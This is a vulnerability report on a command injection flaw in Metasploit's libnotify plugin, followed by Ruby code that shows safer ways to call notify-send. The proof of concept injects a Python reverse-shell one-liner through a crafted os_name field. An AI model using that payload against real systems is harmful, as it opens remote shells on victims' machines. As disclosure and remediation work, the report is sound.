The libnotify plugin has a command injection vulnerability which could be triggered when the client imports info such as hostnames or services specially crafted from another tool.
The impact is low because it is not possible to tamper with the hostname when the client runs a scan with nmap, for example.
Now, if we import the hosts' info from another tool (such as Faraday, OpenVAS or Nessus) and we don't have limitations on the hostname field, the importer plugin will run our field without sanitizing it.
The plugin will run something similar to:
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> db.find_or_create_host(:workspace => 'pepe', :host => '192.168.6.16', :state => Msf::HostState::Alive, :os_name => 'BEGIN\'; python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])')
In this case, I made a little PoC running a reverse shell on another port.
The impact is really low because tools such as nmap filter the hostname based on the fingerprint of the OS, so it is not easy to trigger the bug in a scan, for example, but in an importer plugin it could fit.
In libnotify's callback for db_host:
If we could tamper with the os_name field, this data lands in a call to system in notify-send in order to display the notification.
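As an added illustration (not the reporter's PoC and not the plugin's own code), the Ruby below contrasts the pattern the report describes, a host field interpolated into one shell string handed to system, with the argv form of Kernel#system and with Shellwords.escape; the host and os_name values are constructed samples, and the functions only build commands rather than running notify-send.

```ruby
require 'shellwords'

# Constructed sample: an os_name value of the shape the report describes,
# where a single quote closes the quoted notify-send argument early.
CRAFTED_OS_NAME = "BEGIN'; echo injected; echo '"

# Vulnerable pattern (as described in the report; hypothetical, not the
# plugin's code): the field is interpolated into a single shell string,
# so a quote in the data changes what the shell executes.
def notify_command_unsafe(host, os_name)
  "notify-send 'New host' '#{host} (#{os_name})'"
end

# Hardened form 1: the argv form of Kernel#system. Each element is passed
# to execve as its own argument, no shell parses the data, and quotes in
# the os_name field are just characters inside the notification body.
def notify_argv(host, os_name)
  ['notify-send', 'New host', "#{host} (#{os_name})"]
end

# Hardened form 2: if a shell string is unavoidable, escape every untrusted
# field with Shellwords.escape before interpolating it.
def notify_command_escaped(host, os_name)
  "notify-send 'New host' #{Shellwords.escape("#{host} (#{os_name})")}"
end

# Check helper: count the words a POSIX shell would derive from a command
# string. The intended command has exactly three words; more than that
# means the data escaped its argument, which is the injection condition.
def shell_word_count(cmd)
  Shellwords.split(cmd).length
end
```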